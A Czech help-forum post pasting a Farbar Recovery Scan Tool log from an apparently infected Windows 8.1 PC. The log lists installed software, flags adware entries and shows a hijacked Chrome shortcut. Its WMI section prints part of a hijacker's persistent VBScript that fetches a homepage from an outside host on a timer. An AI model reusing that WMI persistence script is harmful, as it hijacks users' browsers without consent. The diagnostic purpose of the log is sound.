Dobrý den prosím o kontrolu logu děkuji .

Zpráva

kovadlina11 · #1 Příspěvek od **kovadlina11** » 30 črc 2019 09:49

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 29-07-2019
Ran by Radim (30-07-2019 10:37:16)
Running from C:\Users\Radim\Desktop
Windows 8.1 (Update) (X64) (2014-04-29 14:03:09)
Boot Mode: Normal
==========================================================

==================== Accounts: =============================

Administrator (S-1-5-21-2652530150-2383877666-4203637229-500 - Administrator - Disabled)
Guest (S-1-5-21-2652530150-2383877666-4203637229-501 - Limited - Enabled)
HomeGroupUser$ (S-1-5-21-2652530150-2383877666-4203637229-1008 - Limited - Enabled)
Radim (S-1-5-21-2652530150-2383877666-4203637229-1007 - Administrator - Enabled) => C:\Users\Radim
Spravce (S-1-5-21-2652530150-2383877666-4203637229-1001 - Administrator - Enabled) => C:\Users\Spravce

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Avast Antivirus (Enabled - Up to date) {8EA8924E-BC81-DC44-8BB0-8BAE75D86EBF}
AS: Avast Antivirus (Enabled - Up to date) {35C973AA-9ABB-D3CA-B100-B0DC0E5F2402}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

ÂµTorrent (HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\uTorrent) (Version: 3.4.2.31536 - BitTorrent Inc.)
7-Zip 9.25 (x64 edition) (HKLM\...\{23170F69-40C1-2702-0925-000001000000}) (Version: 9.25.00.0 - Igor Pavlov)
Adobe Flash Player 32 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 32.0.0.223 - Adobe)
Adobe Flash Player 32 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 32.0.0.223 - Adobe)
Adobe Reader XI (11.0.06) - Czech (HKLM-x32\...\{AC76BA86-7AD7-1029-7B44-AB0000000001}) (Version: 11.0.06 - Adobe Systems Incorporated)
AGEIA PhysX v2.5.1 (HKLM-x32\...\AGEIA PhysX v2.5.1) (Version: - )
AlphaGo (HKLM-x32\...\{2C652C0A-EC71-4797-8077-F67649177AB0}) (Version: 1.0.2 - Default Company Name) <==== ATTENTION
AlphaGo (HKLM-x32\...\{51639FCA-678F-4D71-8044-E16E3D49187F}) (Version: 1.0.7 - Default Company Name) <==== ATTENTION
AMD Catalyst Install Manager (HKLM\...\{F2A7CE36-57BF-5C86-952D-90DBF3746D82}) (Version: 8.0.916.0 - Advanced Micro Devices, Inc.)
Apple Application Support (HKLM-x32\...\{83CAF0DE-8D3B-4C37-A631-2B8F16EC3031}) (Version: 3.1 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{BDD99690-3541-4619-9D2A-3CDDB3E15F9E}) (Version: 8.0.5.6 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
ASIO4ALL (HKLM-x32\...\ASIO4ALL) (Version: 2.10 - Michael Tippach)
Audacity 2.1.0 (HKLM-x32\...\Audacity_is1) (Version: 2.1.0 - Audacity Team)
Avast Free Antivirus (HKLM-x32\...\Avast Antivirus) (Version: 19.6.2383 - AVAST Software)
Avira (HKLM-x32\...\{0696cc37-db90-4000-be99-4a173ca7c8af}) (Version: 1.1.39.17987 - Avira Operations GmbH & Co. KG)
Boiling Point - Cesta do pekel (HKLM-x32\...\{BPOINT_02082005}) (Version: - )
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
BrickSustainer (HKLM-x32\...\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{fc67e7a0}) (Version: - Fixer) <==== ATTENTION
Brothers in Arms - PekelnĂˇ dĂˇlnice (HKLM-x32\...\Brothers in Arms - Hell's Highway) (Version: 1.0.0.0 - Ubisoft)
Brothers In Arms (HKLM-x32\...\BrothersInArms) (Version: - Ubisoft)
Call of Duty (HKLM-x32\...\Call of Duty) (Version: - )
Call of Juarez - Bound in Blood (HKLM-x32\...\{019908AA-79E9-4389-A1AD-8BBEED63CFBA}) (Version: 1.01.0000 - Ubisoft) Hidden
Call of Juarez - Bound in Blood (HKLM-x32\...\InstallShield_{019908AA-79E9-4389-A1AD-8BBEED63CFBA}) (Version: 1.01.0000 - Ubisoft)
CCleaner (HKLM\...\CCleaner) (Version: 5.60 - Piriform)
Combined Community Codec Pack 2014-03-09 (HKLM-x32\...\Combined Community Codec Pack_is1) (Version: 2014.03.09.0 - CCCP Project)
Counter-Strike 1.6 (HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\Counter-Strike 1.6) (Version: - )
Counter-strike source v18 (HKLM-x32\...\urna css_is1) (Version: - )
CyberLink Media Suite 10 (HKLM-x32\...\InstallShield_{1FBF6C24-C1fD-4101-A42B-0C564F9E8E79}) (Version: 10.0.1.1916 - CyberLink Corp.)
CyberLink PhotoDirector (HKLM-x32\...\InstallShield_{4862344A-A39C-4897-ACD4-A1BED5163C5A}) (Version: 2.0.1.3109 - CyberLink Corp.)
CyberLink Power2Go 8 (HKLM-x32\...\InstallShield_{2A87D48D-3FDF-41fd-97CD-A1E370EFFFE2}) (Version: 8.0.1.1924 - CyberLink Corp.)
CyberLink PowerDirector 10 (HKLM-x32\...\InstallShield_{B0B4F6D2-F2AE-451A-9496-6F2F6A897B32}) (Version: 10.0.1.2006 - CyberLink Corp.)
CyberLink PowerDVD (HKLM-x32\...\InstallShield_{DEC235ED-58A4-4517-A278-C41E8DAEAB3B}) (Version: 10.0.6.4330 - CyberLink Corp.)
CyberLink YouCam (HKLM-x32\...\InstallShield_{01FB4998-33C4-4431-85ED-079E3EEFE75D}) (Version: 4.1.1.3231 - CyberLink Corp.)
DAEMON Tools Lite (HKLM\...\DAEMON Tools Lite) (Version: 10.3.0.0154 - Disc Soft Ltd)
Discord (HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\Discord) (Version: 0.0.305 - Discord Inc.)
EAX4 Unified Redist (HKLM-x32\...\{89661B04-C646-4412-B6D3-5E19F02F1F37}) (Version: 4.001 - Creative Labs)
F.3.A.R. 1.0 (HKLM-x32\...\F.3.A.R._is1) (Version: 1.0 - ĂŤĂ®Ă˘Ĺ±Ă© Ă„ÄŤĹ„Ä™)
Facebook Gameroom 1.21.6907.27509 (HKLM-x32\...\{E34773A0-158F-4322-8849-2C13BBCD6C68}) (Version: 1.21.6907.27509 - Facebook)
Far Manager 3 x64 (HKLM\...\{07F443EE-AE69-49FA-92DA-A4A488501F6D}) (Version: 3.0.3800 - Eugene Roshal & Far Group)
FL Studio 11 (HKLM-x32\...\FL Studio 11) (Version: - Image-Line)
FlowStone FL 3.0 (HKLM-x32\...\FlowStone) (Version: - )
Google Earth (HKLM-x32\...\{4D2A6330-2F8B-11E3-9C40-B8AC6F97B88E}) (Version: 7.1.2.2041 - Google)
Governor of Poker 2 Premium Edition v1.0 Multi (HKLM-x32\...\{8BF806C4-2D77-4F67-8435-D4BDCEB665A8}_is1) (Version: - My Company, Inc.)
Grand Theft Auto Vice City (HKLM-x32\...\{4B35F00C-E63D-40DC-9839-DF15A33EAC46}) (Version: 1.00.000 - )
Hewlett-Packard ACLM.NET v1.2.0.0 (HKLM-x32\...\{6F340107-F9AA-47C6-B54C-C3A19F11553F}) (Version: 1.00.0000 - Hewlett-Packard Company) Hidden
HP 3D DriveGuard (HKLM\...\{96E71D78-8F36-44E8-9F5C-900F1DF6E3B3}) (Version: 5.1.5.1 - Hewlett-Packard Company)
HP ESU for Microsoft Windows 8 (HKLM-x32\...\{50F16F43-54B8-43DB-B96F-255546DFB990}) (Version: 1.0.1.1 - Hewlett-Packard Company)
HP HD Webcam Driver (HKLM-x32\...\{399C37FB-08AF-493B-BFED-20FBD85EDF7F}) (Version: 6.0.1112.2_WHQL - Sonix)
HP Software Framework (HKLM-x32\...\{A3B77E0C-B157-4521-BAF1-C0E69F3D3204}) (Version: 4.6.8.1 - Hewlett-Packard Company)
HP Support Assistant (HKLM-x32\...\{FF27F674-821E-4BA2-985B-DDF539C2CD03}) (Version: 7.0.33.6 - Hewlett-Packard Company)
HP System Default Settings (HKLM-x32\...\{987210BB-D707-48FC-88FA-4374765D108D}) (Version: 2.0.1 - Hewlett-Packard Company)
HP Wireless Button Driver (HKLM-x32\...\{30B2D1D8-0A07-4B71-9553-0710C5D31E35}) (Version: 1.1.2.1 - Hewlett-Packard Company)
HP Wireless Hotspot (HKLM-x32\...\{A161E705-44B9-4B5F-A5F8-8E5847AEA86B}) (Version: 1.0.24.1 - Hewlett-Packard Company)
IDT Audio (HKLM-x32\...\{E3A5A8AB-58F6-45FF-AFCB-C9AE18C05001}) (Version: 1.0.6435.0 - IDT)
IL Shared Libraries (HKLM-x32\...\IL Shared Libraries) (Version: - Image-Line)
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.1.30.1349 - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.4276 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 11.6.5.1006 - Intel Corporation)
IrfanView (remove only) (HKLM-x32\...\IrfanView) (Version: 4.37 - Irfan Skiljan)
Java 7 Update 55 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F86417055FF}) (Version: 7.0.550 - Oracle)
Java 7 Update 55 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83217055FF}) (Version: 7.0.550 - Oracle)
JMicron Flash Media Controller Driver (HKLM-x32\...\{26604C7E-A313-4D12-867F-7C6E7820BE4C}) (Version: 1.0.76.1 - JMicron Technology Corp.)
League of Legends (HKLM-x32\...\League of Legends 1.0) (Version: 1.0 - Riot Games, Inc)
LibreOffice 4.2 Help Pack (Czech) (HKLM-x32\...\{169A0326-8F84-4E21-8D8A-6B4CE5DC24C8}) (Version: 4.2.1.1 - The Document Foundation)
LibreOffice 4.2.1.1 (HKLM-x32\...\{C83C3B4C-1AFF-4CEA-8078-74E7A3FE8F03}) (Version: 4.2.1.1 - The Document Foundation)
Mafia Classic Mod Deluxe (HKLM-x32\...\Mafia Classic Mod Deluxe) (Version: 1.3 - 4Way)
Mafia II (HKLM-x32\...\Mafia II_is1) (Version: - )
Mafia II Music Manager (HKLM-x32\...\Mafia II Music Manager_is1) (Version: 1.1.0.0 - Gottfried & ThielHater)
Medal of Honor: Pacific Assaultâ„˘ (HKLM-x32\...\{56CFA833-F44F-4199-8C58-7F8B38F2BC7B}) (Version: 1.2.1.281 - Electronic Arts)
Microsoft Games for Windows - LIVE Redistributable (HKLM-x32\...\{59E4543A-D49D-4489-B445-473D763C79AF}) (Version: 2.0.672.0 - Microsoft Corporation)
Microsoft PowerPoint Viewer (HKLM-x32\...\{95140000-00AF-0405-0000-0000000FF1CE}) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50918.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.21022 (HKLM\...\{350AA351-21FA-3270-8B7A-835434E766AD}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.50727 (HKLM-x32\...\{15134cb0-b767-4960-a911-f2d16ae54797}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.50727 (HKLM-x32\...\{22154f09-719a-4619-bb71-5b3356999fbf}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24212 (HKLM-x32\...\{323dad84-0974-4d90-a1c1-e006c7fdbb7d}) (Version: 14.0.24212.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24212 (HKLM-x32\...\{462f63a8-6347-4894-a1b3-dbfe3a4c981d}) (Version: 14.0.24212.0 - Microsoft Corporation)
Microsoft WSE 3.0 Runtime (HKLM-x32\...\{E3E71D07-CD27-46CB-8448-16D4FB29AA13}) (Version: 3.0.5305.0 - Microsoft Corp.)
Mission Pack (HKLM-x32\...\Mafia Mission Pack_is1) (Version: - Mission Pack)
Mozilla Firefox 68.0.1 (x64 cs) (HKLM\...\Mozilla Firefox 68.0.1 (x64 cs)) (Version: 68.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 68.0.1 - Mozilla)
Need For Speed Carbon Collectors Edition verze 1.4 (HKLM-x32\...\{8AA04B9B-B73E-4EB8-9837-9D7D1A222BA2}_is1) (Version: 1.4 - Electronic Arts)
NHLÂ® 09 (HKLM-x32\...\{F2B5A2A7-2DF9-4361-8BD5-362714528B51}) (Version: 2.0.1.0 - Electronic Arts)
NVIDIA PhysX (HKLM-x32\...\{8B922CF8-8A6C-41CE-A858-F1755D7F5D29}) (Version: 9.12.1031 - NVIDIA Corporation)
Online Application (HKLM-x32\...\{5266F634-7B7D-4537-BDDC-98DD6CFCBAA1}) (Version: 2.6.0 - Microleaves) Hidden <==== ATTENTION
Opera Stable 45.0.2552.812 (HKLM-x32\...\Opera 45.0.2552.812) (Version: 45.0.2552.812 - Opera Software)
Opera Stable 62.0.3331.72 (HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\Opera 62.0.3331.72) (Version: 62.0.3331.72 - Opera Software)
Origin (HKLM-x32\...\Origin) (Version: 10.5.14.38647 - Electronic Arts, Inc.)
PANZERS - Phase II - Demo (Tunis) (HKLM-x32\...\PANZERS - Phase II - Demo (Tunis)) (Version: - )
PDFCreator (HKLM-x32\...\{0001B4FD-9EA3-4D90-A79E-FD14BA3AB01D}) (Version: 1.7.2 - pdfforge)
PremiumFixer (HKLM-x32\...\S-1910914952) (Version: 2.1.0.1313 - SoftwarePreserver)
PX Profile Update (HKLM-x32\...\{1DC931E3-5F02-910B-75BF-74E002C89C69}) (Version: 1.00.1. - AMD) Hidden
Realtek Ethernet Controller All-In-One Windows Driver (HKLM-x32\...\{F7E7F0CB-AA41-4D5A-B6F2-8E6738EB063F}) (Version: 8.2.612.2012 - Realtek)
Rockstar Games Social Club (HKLM-x32\...\{08B3869E-D282-424C-9AFC-870E04A4BA14}) (Version: 1.00.0000 - Rockstar Games)
S.T.A.L.K.E.R. - Call of Pripyat [v1.6.01] (HKLM-x32\...\{406FB8A4-F539-48A9-809C-F94706F9C9F6}_is1) (Version: 1.6.01 - CENEGA)
S.T.A.L.K.E.R. - Clear Sky [v1.0003] (HKLM-x32\...\S.T.A.L.K.E.R. - Clear Sky_is1) (Version: 1.0003 - Deep Silver)
Saints Row The Third (HKLM-x32\...\Saints Row The Third_is1) (Version: - )
Skypeâ„˘ 7.5 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.5.101 - Skype Technologies S.A.)
SpeedFan (remove only) (HKLM-x32\...\SpeedFan) (Version: - )
Spider-Man Movie DEMO (HKLM-x32\...\Spider-Man Movie DEMO) (Version: DEMO - Activision Publishing, Inc.)
Steam (HKLM-x32\...\{048298C9-A4D3-490B-9FF9-AB023A9238F3}) (Version: 1.0.0.0 - Valve Corporation)
SW-Booster (HKLM-x32\...\S-792098896) (Version: 2.0.0.1120 - SW-Booster) <==== ATTENTION
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 17.0.18.25 - Synaptics Incorporated)
TeamViewer 11 (HKLM-x32\...\TeamViewer) (Version: 11.0.56083 - TeamViewer)
The GodfatherÂ® The Game (HKLM-x32\...\{1D2CF076-A63F-41A5-00A1-5924FADFAD9D}) (Version: - )
THE SETTLERS - DÄ›dictvĂ krĂˇlĹŻ (HKLM-x32\...\{8FDC1610-3FB5-4EF2-A0D0-CEDC3A525A25}) (Version: 1.00.0000 - Blue Byte)
Tropico 4 (HKLM-x32\...\Tropico 4_is1) (Version: - )
Unity Web Player (HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\UnityWebPlayer) (Version: 4.5.1f3 - Unity Technologies ApS)
Vietcong & Vietcong: Fist Alpha (HKLM-x32\...\{DCF5C463-BD5C-4982-91F9-2C3F8F9E9C88}) (Version: 1.06 - )
Vietcong 2 (HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\Vietcong 2) (Version: - )
VirtualDJ 8 (HKLM-x32\...\{C3FADEEE-3EA2-4205-A7DA-82B38FB857B0}) (Version: 8.2.3731.0 - Atomix Productions)
VLC media player (HKLM\...\VLC media player) (Version: 3.0.7.1 - VideoLAN)
Warcraft III (HKLM-x32\...\Warcraft III) (Version: - )
WinRAR 5.01 (32-bit) (HKLM-x32\...\WinRAR archiver) (Version: 5.01.0 - win.rar GmbH)
World of Tanks (HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\{1EAC1D02-C6AC-4FA6-9A44-96258C37C812eu}_is1) (Version: - Wargaming.net)

Packages:
=========
Hry -> C:\Program Files\WindowsApps\Microsoft.XboxLIVEGames_2.0.139.0_x64__8wekyb3d8bbwe [2014-03-18] (Microsoft Corporation) [MS Ad]
Hudba -> C:\Program Files\WindowsApps\Microsoft.ZuneMusic_2.6.672.0_x64__8wekyb3d8bbwe [2015-03-28] (Microsoft Corporation) [MS Ad]
Kinect for Windows Framework -> C:\Program Files\WindowsApps\Microsoft.WindowsPreview.Kinect.8.0_2.0.1410.19000_x64__8wekyb3d8bbwe [2015-03-28] (Microsoft Corporation)
Kinect for Windows Framework -> C:\Program Files\WindowsApps\Microsoft.WindowsPreview.Kinect.8.0_2.0.1410.19000_x86__8wekyb3d8bbwe [2015-03-28] (Microsoft Corporation)
Kinect for Windows Framework -> C:\Program Files\WindowsApps\Microsoft.WindowsPreview.Kinect.8.1_2.0.1410.19000_x64__8wekyb3d8bbwe [2015-03-28] (Microsoft Corporation)
Kinect for Windows Framework -> C:\Program Files\WindowsApps\Microsoft.WindowsPreview.Kinect.8.1_2.0.1410.19000_x86__8wekyb3d8bbwe [2015-03-28] (Microsoft Corporation)
MSN CestovĂˇnĂ -> C:\Program Files\WindowsApps\Microsoft.BingTravel_3.0.4.336_x64__8wekyb3d8bbwe [2015-07-18] (Microsoft Corporation) [MS Ad]
MSN Finance -> C:\Program Files\WindowsApps\Microsoft.BingFinance_3.0.4.344_x64__8wekyb3d8bbwe [2016-04-27] (Microsoft Corporation) [MS Ad]
MSN GurmĂˇnskĂ˝ svÄ›t -> C:\Program Files\WindowsApps\Microsoft.BingFoodAndDrink_3.0.4.336_x64__8wekyb3d8bbwe [2015-07-18] (Microsoft Corporation) [MS Ad]
MSN PoÄŤasĂ -> C:\Program Files\WindowsApps\Microsoft.BingWeather_3.0.4.350_x64__8wekyb3d8bbwe [2017-07-13] (Microsoft Corporation) [MS Ad]
MSN Sport -> C:\Program Files\WindowsApps\Microsoft.BingSports_3.0.4.345_x64__8wekyb3d8bbwe [2016-04-29] (Microsoft Corporation) [MS Ad]
MSN ZdravĂ a fitness -> C:\Program Files\WindowsApps\Microsoft.BingHealthAndFitness_3.0.4.336_x64__8wekyb3d8bbwe [2015-07-18] (Microsoft Corporation) [MS Ad]
MSN ZprĂˇvy -> C:\Program Files\WindowsApps\Microsoft.BingNews_3.0.4.344_x64__8wekyb3d8bbwe [2016-04-27] (Microsoft Corporation) [MS Ad]
Video -> C:\Program Files\WindowsApps\Microsoft.ZuneVideo_2.6.446.0_x64__8wekyb3d8bbwe [2015-11-05] (Microsoft Corporation) [MS Ad]
VĂ˝bÄ›r prohlĂĹľeÄŤe -> C:\WINDOWS\BrowserChoice [2014-04-29] (Microsoft Corporation)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007_Classes\CLSID\{820D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> C:\WINDOWS\system32\igfxEM.exe (Intel Corporation - pGFX -> Intel Corporation)
ShellExecuteHooks: No Name - {E080595E-3381-11E7-A376-64006A5CFC23} - -> No File
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShell.dll [2019-07-24] (AVAST Software s.r.o. -> AVAST Software)
ShellIconOverlayIdentifiers: [JzShlobj] -> {9A0700D2-920A-4E52-8697-9B5230C92612} => -> No File
ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2011-09-16] (Igor Pavlov) [File not signed]
ContextMenuHandlers1: [avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShell.dll [2019-07-24] (AVAST Software s.r.o. -> AVAST Software)
ContextMenuHandlers1: [CLVDShellExt] -> {3E2A0A32-6E14-4BAD-AA87-BBB6A75EBFF2} => C:\Program Files (x86)\Common Files\CyberLink\ShellExtComponent\CLVDShellExt.dll [2012-07-25] (CyberLink -> Cyberlink)
ContextMenuHandlers1: [JsZipShlExt] -> {5C551008-A347-4DB3-AF48-014076FD2B46} => -> No File
ContextMenuHandlers1: [JZContextMenuExt] -> {5C551008-A347-4DB3-AF48-014076FD2B46} => -> No File
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext64.dll [2013-12-01] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext.dll [2013-12-01] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers2: [CLVDShellExt] -> {3E2A0A32-6E14-4BAD-AA87-BBB6A75EBFF2} => C:\Program Files (x86)\Common Files\CyberLink\ShellExtComponent\CLVDShellExt.dll [2012-07-25] (CyberLink -> Cyberlink)
ContextMenuHandlers2: [JsZipShlExt] -> {5C551008-A347-4DB3-AF48-014076FD2B46} => -> No File
ContextMenuHandlers3: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShell.dll [2019-07-24] (AVAST Software s.r.o. -> AVAST Software)
ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2011-09-16] (Igor Pavlov) [File not signed]
ContextMenuHandlers4: [JsZipShlExt] -> {5C551008-A347-4DB3-AF48-014076FD2B46} => -> No File
ContextMenuHandlers5: [ACE] -> {5E2121EE-0300-11D4-8D3B-444553540000} => C:\Program Files (x86)\AMD\ATI.ACE\Core-Static\atiacm64.dll [2014-11-20] (Advanced Micro Devices, Inc.) [File not signed]
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> No File
ContextMenuHandlers5: [igfxDTCM] -> {9B5F5829-A529-4B12-814A-E81BCB8D93FC} => C:\WINDOWS\system32\igfxDTCM.dll [2015-08-27] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
ContextMenuHandlers5: [igfxOSP] -> {FA507C3F-30C6-4DCA-9EE5-2656072EEC14} => C:\WINDOWS\system32\igfxOSP.dll [2015-08-27] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
ContextMenuHandlers6: [avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShell.dll [2019-07-24] (AVAST Software s.r.o. -> AVAST Software)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext64.dll [2013-12-01] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext.dll [2013-12-01] (win.rar GmbH -> Alexander Roshal)

==================== Shortcuts & WMI ========================

(The entries could be listed to be restored or removed.)

WMI:subscription\__FilterToConsumerBinding->\\.\root\subscription:ActiveScriptEventConsumer.Name=\"ASEC\"",Filter="\\.\root\subscription:__EventFilter.Name=\"EventFilter sethomePage2\":: <==== ATTENTION
WMI:subscription\__TimerInstruction->SethomePage Interval Timer:: <==== ATTENTION
WMI:subscription\__IntervalTimerInstruction->SethomePage Interval Timer:: <==== ATTENTION
WMI:subscription\__EventFilter->EventFilter sethomePage2::[Query => Select * From __timerevent Where TimerId = "SethomePage Interval Timer"] <==== ATTENTION
WMI:subscription\ActiveScriptEventConsumer->ASEC::[ScriptText => Dim xmlHttp:Dim homePageUrl:Set xmlHttp = CreateObject("MSXML2.XMLHTTP"):xmlHttp.open "GET", "http://bbtbfr.pw/GetHPHost?"&Timer(), False:On Error Resume Next:xmlHttp.send:if xmlHttp.status = 200 then:homePageUrl= xmlHttp.responseText:end if:Dim objFS:Set objFS = CreateObject("Scripting.FileSystemOb (the data entry has 2410 more characters).] <==== ATTENTION

Shortcut: C:\Users\Radim\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VirtualDJ\Online Help.lnk -> hxxp://www.virtualdj.com/wiki
Shortcut: C:\Users\Radim\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VirtualDJ\www.virtualdj.com.lnk -> hxxp://www.virtualdj.com
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome\Google Chrome.lnk -> C:\Program Files (x86)\Footjane\Application\chrome.exe (Google Inc.)

==================== Loaded Modules (Whitelisted) ==============

2016-05-18 19:52 - 2016-05-18 19:52 - 000048640 _____ () [File not signed] C:\WINDOWS\mmfs.dll
2016-05-18 19:52 - 2016-05-18 19:52 - 000016384 _____ () [File not signed] C:\WINDOWS\runservice.exe
2014-06-27 02:25 - 2014-06-27 02:25 - 000299520 _____ (Advanced Micro Devices Inc.) [File not signed] C:\Program Files (x86)\AMD\ATI.ACE\Core-Static\MOM.exe
2014-04-29 17:34 - 2014-04-29 17:33 - 000327680 ____N (IDT, Inc.) [File not signed] C:\Program Files\IDT\WDM\STacSV64.exe
2011-09-16 19:35 - 2011-09-16 19:35 - 000082432 _____ (Igor Pavlov) [File not signed] C:\Program Files\7-Zip\7-zip.dll
2014-04-29 13:50 - 2014-04-29 16:50 - 000465920 _____ (Intel Corporation) [File not signed] C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\ISDI2.dll
2014-04-29 13:50 - 2014-04-29 16:50 - 000269824 _____ (Intel Corporation) [File not signed] C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\PsiData.dll
